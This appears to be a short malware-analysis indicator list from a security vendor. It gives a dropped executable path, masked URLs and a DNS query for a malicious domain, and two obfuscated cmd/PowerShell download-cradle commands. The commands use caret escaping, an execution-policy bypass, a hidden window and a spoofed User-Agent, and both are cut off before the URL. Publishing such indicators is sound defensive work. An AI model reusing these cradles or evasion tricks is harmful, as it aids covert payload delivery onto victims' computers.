Technical information
- %LOCALAPPDATA%\templel61.exe
- http://dr####.##artwebsitedesign.com/local.php
- http://dr####.##artwebsitedesign.com/cgi-sys/suspendedpage.cgi
- DNS ASK dr####.##artwebsitedesign.com
- '<SYSTEM32>\cmd.exe' /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('ht...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('ht...